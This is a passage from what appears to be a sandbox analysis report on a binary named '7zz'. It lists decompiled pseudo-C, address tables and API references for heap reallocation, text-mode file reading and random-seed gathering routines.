							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0046E56A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E0046F866(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x496580, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x49015c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = L0046FC2E(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E0046F902(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E0046C5C0(_v40, _a4, _t74);
													E0046F8BD(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x496580, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E0046C5C0(_v40, _t97, _t68);
												E0046F8BD(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E0046CC23();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E0046E8D6(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0046E56A(9);
							_v8 = _t113;
							_t80 = E0046EB0B(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0046CAD5();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x49657c; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E0046F314();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E0046EE5F();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E0046C5C0(_v40, _t97, _t91);
										_t93 = E0046EB0B(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E0046EB36();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x496580, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E0046C5C0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E0046EB36();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E0046E8D6(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E0046C0FF(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = L0046BFC5(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































                                                                      0x0046c94d
                                                                      0x0046c94f
                                                                      0x0046c954
                                                                      0x0046c95f
                                                                      0x0046c960
                                                                      0x0046c967
                                                                      0x0046c96d
                                                                      0x0046c970
                                                                      0x0046c974
                                                                      0x0046c984
                                                                      0x0046c987
                                                                      0x0046c989
                                                                      0x0046c997
                                                                      0x0046c99c
                                                                      0x0046c99f
                                                                      0x0046cade
                                                                      0x0046cae1
                                                                      0x0046cc2e
                                                                      0x0046cc2e
                                                                      0x0046cc30
                                                                      0x0046cc33
                                                                      0x0046cc35
                                                                      0x0046cc37
                                                                      0x0046cc3b
                                                                      0x0046cc3b
                                                                      0x0046cc3f
                                                                      0x0046cc3f
                                                                      0x0046cc4b
                                                                      0x0046cc4b
                                                                      0x0046cc51
                                                                      0x0046cc53
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cc55
                                                                      0x0046cc5b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cc5e
                                                                      0x0046cc64
                                                                      0x0046cc66
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cc66
                                                                      0x00000000
                                                                      0x0046cc2e
                                                                      0x0046cae7
                                                                      0x0046caea
                                                                      0x0046caec
                                                                      0x0046caee
                                                                      0x0046cafa
                                                                      0x0046caf0
                                                                      0x0046caf3
                                                                      0x0046caf3
                                                                      0x0046cafb
                                                                      0x0046cafb
                                                                      0x0046cafe
                                                                      0x0046cafe
                                                                      0x0046cb01
                                                                      0x0046cb04
                                                                      0x0046cb0c
                                                                      0x0046cb11
                                                                      0x0046cb12
                                                                      0x0046cb22
                                                                      0x0046cb27
                                                                      0x0046cb2a
                                                                      0x0046cb2c
                                                                      0x0046cb2f
                                                                      0x0046cb31
                                                                      0x0046cbf1
                                                                      0x0046cb37
                                                                      0x0046cb37
                                                                      0x0046cb3d
                                                                      0x0046cb41
                                                                      0x0046cb4c
                                                                      0x0046cb51
                                                                      0x0046cb54
                                                                      0x0046cb56
                                                                      0x0046cb61
                                                                      0x0046cb67
                                                                      0x0046cb6a
                                                                      0x0046cb6c
                                                                      0x0046cb71
                                                                      0x0046cb74
                                                                      0x0046cb77
                                                                      0x0046cb79
                                                                      0x0046cb7b
                                                                      0x0046cb7b
                                                                      0x0046cb84
                                                                      0x0046cb90
                                                                      0x0046cb95
                                                                      0x0046cb95
                                                                      0x0046cb58
                                                                      0x0046cb5b
                                                                      0x0046cb5b
                                                                      0x0046cb98
                                                                      0x0046cb98
                                                                      0x0046cb9b
                                                                      0x0046cb9f
                                                                      0x0046cbaa
                                                                      0x0046cbb0
                                                                      0x0046cbb3
                                                                      0x0046cbb5
                                                                      0x0046cbba
                                                                      0x0046cbbd
                                                                      0x0046cbc0
                                                                      0x0046cbc2
                                                                      0x0046cbc4
                                                                      0x0046cbc4
                                                                      0x0046cbcb
                                                                      0x0046cbd7
                                                                      0x0046cbdc
                                                                      0x0046cbdc
                                                                      0x0046cbb5
                                                                      0x0046cb9f
                                                                      0x0046cbf4
                                                                      0x0046cbf4
                                                                      0x0046cbf4
                                                                      0x0046cbf8
                                                                      0x0046cbf8
                                                                      0x0046cbfd
                                                                      0x0046cc00
                                                                      0x0046cc02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cc04
                                                                      0x0046cc0a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cc0d
                                                                      0x0046cc13
                                                                      0x0046cc15
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cc1b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046c9a5
                                                                      0x0046c9a5
                                                                      0x0046c9a5
                                                                      0x0046c9a8
                                                                      0x0046c9ab
                                                                      0x0046caa2
                                                                      0x0046caa2
                                                                      0x0046caa5
                                                                      0x0046caa7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046caad
                                                                      0x0046cab3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0046cab3
                                                                      0x0046c9b3
                                                                      0x0046c9b9
                                                                      0x0046c9bd
                                                                      0x0046c9c3
                                                                      0x0046c9c6
                                                                      0x0046c9c8
                                                                      0x0046ca72
                                                                      0x0046ca72
                                                                      0x0046ca76
                                                                      0x0046ca7b
                                                                      0x0046ca7e
                                                                      0x0046ca80
                                                                      0x0046ca82
                                                                      0x0046ca86
                                                                      0x0046ca86
                                                                      0x0046ca8a
                                                                      0x0046ca8a
                                                                      0x0046ca8d
                                                                      0x0046ca9f
                                                                      0x0046ca9f
                                                                      0x00000000
                                                                      0x0046ca7e
                                                                      0x0046c9ce
                                                                      0x0046c9d4
                                                                      0x0046c9d6
                                                                      0x0046c9d7
                                                                      0x0046c9d8
                                                                      0x0046c9d9
                                                                      0x0046c9de
                                                                      0x0046c9e1
                                                                      0x0046c9e3
                                                                      0x0046c9ea
                                                                      0x0046c9eb
                                                                      0x0046c9f1
                                                                      0x0046c9f4
                                                                      0x0046c9f6
                                                                      0x0046c9fb
                                                                      0x0046c9fc
                                                                      0x0046c9ff
                                                                      0x0046ca01
                                                                      0x0046ca03
                                                                      0x0046ca03
                                                                      0x0046ca0a
                                                                      0x0046ca10
                                                                      0x0046ca15
                                                                      0x0046ca18
                                                                      0x0046ca19
                                                                      0x0046ca1a
                                                                      0x0046ca1f
                                                                      0x0046ca1f
                                                                      0x0046c9e5
                                                                      0x0046c9e5
                                                                      0x0046c9e5
                                                                      0x0046c9e3
                                                                      0x0046ca22
                                                                      0x0046ca25
                                                                      0x0046ca27
                                                                      0x0046ca29
                                                                      0x0046ca2d
                                                                      0x0046ca2e
                                                                      0x0046ca2e
                                                                      0x0046ca34
                                                                      0x0046ca37
                                                                      0x0046ca42
                                                                      0x0046ca48
                                                                      0x0046ca4b
                                                                      0x0046ca4d
                                                                      0x0046ca52
                                                                      0x0046ca53
                                                                      0x0046ca56
                                                                      0x0046ca58
                                                                      0x0046ca5a
                                                                      0x0046ca5a
                                                                      0x0046ca61
                                                                      0x0046ca66
                                                                      0x0046ca67
                                                                      0x0046ca6a
                                                                      0x0046ca6f
                                                                      0x0046ca6f
                                                                      0x0046ca4d
                                                                      0x00000000
                                                                      0x0046cab9
                                                                      0x0046caba
                                                                      0x0046cac0
                                                                      0x0046cac0
                                                                      0x00000000
                                                                      0x0046c98b
                                                                      0x0046c98c
                                                                      0x0046cc68
                                                                      0x0046cc68
                                                                      0x0046cc68
                                                                      0x00000000
                                                                      0x0046cc68
                                                                      0x0046c976
                                                                      0x0046c979
                                                                      0x0046cc6a
                                                                      0x0046cc6d
                                                                      0x0046cc78
                                                                      0x0046cc78

                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a5f0e721197bde267cb9150e65b71ae890a153e108e8c02300e1674c155f234
                                                                      • Instruction ID: 17e87dca6aaccdebba4e5c35270bbda758384f6f49e70602d0c86d8a415a7f21
                                                                      • Opcode Fuzzy Hash: 5a5f0e721197bde267cb9150e65b71ae890a153e108e8c02300e1674c155f234
                                                                      • Instruction Fuzzy Hash: 459109B1D00118ABDB21EB65DCC5ABE7BB4EB45764F200127F899B6290F7398D40C76E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0047143F Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0047143F(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t75;
				void* _t78;
				intOrPtr _t82;
				signed char _t83;
				signed char _t85;
				long _t86;
				void* _t88;
				signed char _t90;
				signed char _t91;
				signed int _t95;
				intOrPtr _t96;
				char _t98;
				signed int _t99;
				long _t101;
				long _t102;
				signed int _t103;
				intOrPtr _t106;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed char _t112;
				signed char* _t113;
				long _t115;
				void* _t119;
				signed int _t120;
				intOrPtr* _t121;
				signed int _t123;
				signed char* _t124;
				void* _t125;
				void* _t126;

				_v12 = _v12 & 0x00000000;
				_t108 = _a8;
				_t119 = _t108;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t75 = _a4;
				_t111 = _t75 >> 5;
				_t121 = 0x496460 + _t111 * 4;
				_t123 = (_t75 & 0x0000001f) + (_t75 & 0x0000001f) * 8 << 2;
				_t78 =  *((intOrPtr*)(0x496460 + _t111 * 4)) + _t123;
				_t112 =  *((intOrPtr*)(_t78 + 4));
				if((_t112 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t112 & 0x00000048) != 0) {
					_t106 =  *((intOrPtr*)(_t78 + 5));
					if(_t106 != 0xa) {
						_a12 = _a12 - 1;
						 *_t108 = _t106;
						_t20 = _t108 + 1; // 0x4
						_t119 = _t20;
						_v12 = 1;
						 *((char*)( *_t121 + _t123 + 5)) = 0xa;
					}
				}
				if(ReadFile( *( *_t121 + _t123), _t119, _a12,  &_v16, 0) != 0) {
					_t82 =  *_t121;
					_t120 = _v16;
					_v12 = _v12 + _t120;
					_t31 = _t123 + 4; // 0x4
					_t113 = _t82 + _t31;
					_t83 =  *((intOrPtr*)(_t82 + _t123 + 4));
					__eflags = _t83 & 0x00000080;
					if((_t83 & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t120;
					if(_t120 == 0) {
						L15:
						_t85 = _t83 & 0x000000fb;
						__eflags = _t85;
						L16:
						 *_t113 = _t85;
						_t86 = _a8;
						_a12 = _t86;
						_t115 = _v12 + _t86;
						__eflags = _t86 - _t115;
						_v12 = _t115;
						if(_t86 >= _t115) {
							L40:
							_t109 = _t108 - _a8;
							__eflags = _t109;
							_v12 = _t109;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t88 =  *_a12;
							__eflags = _t88 - 0x1a;
							if(_t88 == 0x1a) {
								break;
							}
							__eflags = _t88 - 0xd;
							if(_t88 == 0xd) {
								__eflags = _a12 - _t115 - 1;
								if(_a12 >= _t115 - 1) {
									_a12 = _a12 + 1;
									_t95 = ReadFile( *( *_t121 + _t123),  &_v5, 1,  &_v16, 0);
									__eflags = _t95;
									if(_t95 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t108 = 0xd;
											L35:
											_t108 = _t108 + 1;
											__eflags = _t108;
											L36:
											_t115 = _v12;
											__eflags = _a12 - _t115;
											if(_a12 < _t115) {
												continue;
											}
											goto L40;
										}
										_t96 =  *_t121;
										__eflags =  *(_t96 + _t123 + 4) & 0x00000048;
										if(( *(_t96 + _t123 + 4) & 0x00000048) == 0) {
											__eflags = _t108 - _a8;
											if(__eflags != 0) {
												L33:
												E004716C1(__eflags, _a4, 0xffffffff, 1);
												_t126 = _t126 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t108 = 0xa;
											goto L35;
										}
										_t98 = _v5;
										__eflags = _t98 - 0xa;
										if(_t98 == 0xa) {
											goto L32;
										}
										 *_t108 = 0xd;
										_t108 = _t108 + 1;
										 *((char*)( *_t121 + _t123 + 5)) = _t98;
										goto L36;
									}
									_t99 = GetLastError();
									__eflags = _t99;
									if(_t99 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t101 = _a12 + 1;
								__eflags =  *_t101 - 0xa;
								if( *_t101 != 0xa) {
									 *_t108 = 0xd;
									_t108 = _t108 + 1;
									_a12 = _t101;
									goto L36;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t108 = _t88;
							_t108 = _t108 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t124 =  *_t121 + _t123 + 4;
						_t90 =  *_t124;
						__eflags = _t90 & 0x00000040;
						if((_t90 & 0x00000040) == 0) {
							_t91 = _t90 | 0x00000002;
							__eflags = _t91;
							 *_t124 = _t91;
						}
						goto L40;
					}
					__eflags =  *_t108 - 0xa;
					if( *_t108 != 0xa) {
						goto L15;
					}
					_t85 = _t83 | 0x00000004;
					goto L16;
				}
				_t102 = GetLastError();
				_t125 = 5;
				if(_t102 != _t125) {
					__eflags = _t102 - 0x6d;
					if(_t102 == 0x6d) {
						goto L42;
					}
					_t103 = E004705D3(_t102);
					L10:
					return _t103 | 0xffffffff;
				}
				 *((intOrPtr*)(E00470646())) = 9;
				_t103 = E0047064F();
				 *_t103 = _t125;
				goto L10;
			}




































                                                                      0x00471445
                                                                      0x0047144e
                                                                      0x00471453
                                                                      0x00471455
                                                                      0x00471611
                                                                      0x00471611
                                                                      0x00000000
                                                                      0x00471611
                                                                      0x0047145b
                                                                      0x00471463
                                                                      0x00471470
                                                                      0x00471477
                                                                      0x0047147a
                                                                      0x0047147c
                                                                      0x00471482
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0047148b
                                                                      0x0047148d
                                                                      0x00471492
                                                                      0x00471494
                                                                      0x00471497
                                                                      0x0047149b
                                                                      0x0047149b
                                                                      0x0047149e
                                                                      0x004714a5
                                                                      0x004714a5
                                                                      0x00471492
                                                                      0x004714c1
                                                                      0x004714fc
                                                                      0x004714fe
                                                                      0x00471501
                                                                      0x00471504
                                                                      0x00471504
                                                                      0x00471508
                                                                      0x0047150c
                                                                      0x0047150e
                                                                      0x0047160c
                                                                      0x00000000
                                                                      0x0047160c
                                                                      0x00471514
                                                                      0x00471516
                                                                      0x00471521
                                                                      0x00471521
                                                                      0x00471521
                                                                      0x00471523
                                                                      0x00471523
                                                                      0x00471525
                                                                      0x0047152b
                                                                      0x0047152e
                                                                      0x00471530
                                                                      0x00471532
                                                                      0x00471535
                                                                      0x00471606
                                                                      0x00471606
                                                                      0x00471606
                                                                      0x00471609
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0047153b
                                                                      0x0047153b
                                                                      0x0047153e
                                                                      0x00471540
                                                                      0x00471542
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00471548
                                                                      0x0047154a
                                                                      0x00471558
                                                                      0x0047155b
                                                                      0x0047157b
                                                                      0x00471589
                                                                      0x0047158f
                                                                      0x00471591
                                                                      0x0047159d
                                                                      0x0047159d
                                                                      0x004715a1
                                                                      0x004715e4
                                                                      0x004715e4
                                                                      0x004715e7
                                                                      0x004715e7
                                                                      0x004715e7
                                                                      0x004715e8
                                                                      0x004715e8
                                                                      0x004715eb
                                                                      0x004715ee
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004715f4
                                                                      0x004715a3
                                                                      0x004715a5
                                                                      0x004715aa
                                                                      0x004715bf
                                                                      0x004715c2
                                                                      0x004715cf
                                                                      0x004715d6
                                                                      0x004715db
                                                                      0x004715de
                                                                      0x004715e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004715e2
                                                                      0x004715c4
                                                                      0x004715c8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004715ca
                                                                      0x004715ca
                                                                      0x00000000
                                                                      0x004715ca
                                                                      0x004715ac
                                                                      0x004715af
                                                                      0x004715b1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004715b3
                                                                      0x004715b8
                                                                      0x004715b9
                                                                      0x00000000
                                                                      0x004715b9
                                                                      0x00471593
                                                                      0x00471599
                                                                      0x0047159b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0047159b
                                                                      0x00471560
                                                                      0x00471561
                                                                      0x00471564
                                                                      0x0047156c
                                                                      0x0047156f
                                                                      0x00471570
                                                                      0x00000000
                                                                      0x00471570
                                                                      0x00471566
                                                                      0x00000000
                                                                      0x00471566
                                                                      0x0047154c
                                                                      0x0047154e
                                                                      0x0047154f
                                                                      0x00000000
                                                                      0x0047154f
                                                                      0x004715f8
                                                                      0x004715fc
                                                                      0x004715fe
                                                                      0x00471600
                                                                      0x00471602
                                                                      0x00471602
                                                                      0x00471604
                                                                      0x00471604
                                                                      0x00000000
                                                                      0x00471600
                                                                      0x00471518
                                                                      0x0047151b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0047151d
                                                                      0x00000000
                                                                      0x0047151d
                                                                      0x004714c3
                                                                      0x004714cb
                                                                      0x004714ce
                                                                      0x004714e4
                                                                      0x004714e7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004714ee
                                                                      0x004714f4
                                                                      0x00000000
                                                                      0x004714f4
                                                                      0x004714d5
                                                                      0x004714db
                                                                      0x004714e0
                                                                      0x00000000

                                                                      APIs
                                                                      • ReadFile.KERNEL32(00000003,00000003,00000000,00000003,00000000,?,00000002,00000000), ref: 004714B9
                                                                      • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 004714C3
                                                                      • ReadFile.KERNEL32(?,?,00000001,00000003,00000000,?,00000002,00000000), ref: 00471589
                                                                      • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007CCD), ref: 00471593
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastRead
                                                                      • String ID:
                                                                      • API String ID: 1948546556-0
                                                                      • Opcode ID: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
                                                                      • Instruction ID: 3acba76942d2db7199ab0c4a203b8ba3d5a06c5b05a066009057d9eb64363bcb
                                                                      • Opcode Fuzzy Hash: 624ec795883e0c2137594efc4a7571c2dcd972e7bb4f4fe6413c1de08f5d7430
                                                                      • Instruction Fuzzy Hash: 5251D774A04285AFDF258FACC884BEA7BF0AF42304F14C49BE45A8B361D378D955CB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00456AB0 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 65%
                                                                      			E00456AB0(void* __ecx, void* __eflags) {
				char _v72;
				char _v100;
				char _v104;
				char _v112;
				char _v120;
				char _v124;
				union _LARGE_INTEGER _v128;
				long _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v156;
				long _t28;
				int _t30;
				long _t31;
				intOrPtr _t37;
				void* _t38;
				void* _t55;
				void* _t56;

				_t56 = __ecx;
				E00456CC0( &_v104);
				_v72 = 0;
				_v124 = GetCurrentProcessId();
				_push(4);
				_push( &_v124);
				E004574D0( &_v104);
				_t28 = GetCurrentThreadId();
				_push(4);
				_push( &_v132);
				_v132 = _t28;
				E004574D0( &_v112);
				_v136 = 0x3e8;
				do {
					_t54 =  &_v128;
					_t30 = QueryPerformanceCounter( &_v128);
					_t61 = _t30;
					if(_t30 != 0) {
						_push(8);
						_push( &_v128);
						E004574D0( &_v120);
					}
					_t31 = GetTickCount();
					_push(4);
					_push( &_v132);
					_v132 = _t31;
					E004574D0( &_v120);
					_t55 = 0x64;
					do {
						_push(_t56);
						E00457570( &_v128, _t54, _t61);
						E00456CC0( &_v132);
						_push(0x14);
						_push(_t56);
						_v100 = 0;
						E004574D0( &_v132);
						_t55 = _t55 - 1;
					} while (_t55 != 0);
					_t37 = _v156 - 1;
					_t63 = _t37;
					_v156 = _t37;
				} while (_t37 != 0);
				_push(_t56);
				_t38 = E00457570( &_v140, _t54, _t63);
				 *((char*)(_t56 + 0x14)) = 0;
				return _t38;
			}





















                                                                      0x00456ab6
                                                                      0x00456abd
                                                                      0x00456ac4
                                                                      0x00456ace
                                                                      0x00456ad6
                                                                      0x00456ad8
                                                                      0x00456add
                                                                      0x00456ae2
                                                                      0x00456aec
                                                                      0x00456aee
                                                                      0x00456af3
                                                                      0x00456af7
                                                                      0x00456b02
                                                                      0x00456b0a
                                                                      0x00456b0a
                                                                      0x00456b0f
                                                                      0x00456b15
                                                                      0x00456b17
                                                                      0x00456b1d
                                                                      0x00456b1f
                                                                      0x00456b24
                                                                      0x00456b24
                                                                      0x00456b29
                                                                      0x00456b2f
                                                                      0x00456b31
                                                                      0x00456b36
                                                                      0x00456b3a
                                                                      0x00456b3f
                                                                      0x00456b44
                                                                      0x00456b44
                                                                      0x00456b49
                                                                      0x00456b52
                                                                      0x00456b57
                                                                      0x00456b59
                                                                      0x00456b5e
                                                                      0x00456b62
                                                                      0x00456b67
                                                                      0x00456b67
                                                                      0x00456b6e
                                                                      0x00456b6e
                                                                      0x00456b6f
                                                                      0x00456b6f
                                                                      0x00456b75
                                                                      0x00456b7a
                                                                      0x00456b7f
                                                                      0x00456b89

                                                                      APIs
                                                                      • GetCurrentProcessId.KERNEL32(00000000,00491548,?,00000000), ref: 00456AC8
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00456AE2
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00456B0F
                                                                      • GetTickCount.KERNEL32 ref: 00456B29
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Current$CountCounterPerformanceProcessQueryThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1503542204-0
                                                                      • Opcode ID: bf9c5bfcbe972eb42892c2302544a30870c7319e43138cbb240557299388031a
